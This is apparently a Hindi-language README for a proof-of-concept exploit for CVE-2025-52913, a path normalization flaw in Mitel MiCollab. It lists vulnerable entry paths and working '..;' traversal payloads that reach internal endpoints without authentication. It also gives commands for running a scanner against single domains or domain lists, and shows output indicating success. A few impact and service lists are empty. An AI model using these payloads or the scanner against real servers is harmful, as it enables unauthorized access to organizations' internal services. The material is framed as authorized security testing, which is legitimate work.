
CVE-2025-52913 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC), जो Mitel MiCollab को प्रभावित करने वाली एक पथ सामान्यीकरण (path normalization) भेद्यता है।
इस रिपॉजिटरी में CVE-2025-52913 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है, जो Mitel MiCollab को प्रभावित करने वाली एक पथ सामान्यीकरण भेद्यता है।
यह समस्या बिना प्रमाणीकरण के हमलावरों को ..; जैसे विशेष रूप से तैयार किए गए URL अनुक्रमों का उपयोग करके इच्छित पथ प्रतिबंधों को बायपास करने और आंतरिक एप्लिकेशन एंडपॉइंट्स तक पहुंच प्राप्त करने की अनुमति देती है।
सफल शोषण से निम्न हो सकता है:
यह भेद्यता निम्नलिखित पथों के माध्यम से ट्रिगर की जा सकती है:
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/
उदाहरण ट्रैवर्सल पेलोड्स:
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do
pip install -r requirements.txt
python3 POC-CVE-2025-52913.py example.com
python3 POC-CVE-2025-52913.py domains.txt
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
[!] Possible success
एक लक्ष्य संभवतः असुरक्षित है यदि:
सर्वर HTTP 200 के साथ प्रतिक्रिया करता है
प्रतिक्रिया में निम्नलिखित शामिल है:
Axis2Axis2 Happiness Pageयह भेद्यता ..; युक्त विशेष रूप से तैयार किए गए पथों के अनुचित सामान्यीकरण के कारण उत्पन्न होती है, जो इच्छित एप्लिकेशन संदर्भ से परे ट्रैवर्सल की अनुमति देती है।
यह व्यवहार निम्नलिखित आंतरिक सेवाओं को उजागर कर सकता है:
Dahmani Toumi द्वारा खोजा गया
यह परियोजना केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है।
इस टूल का उपयोग स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध न करें। लेखक किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है।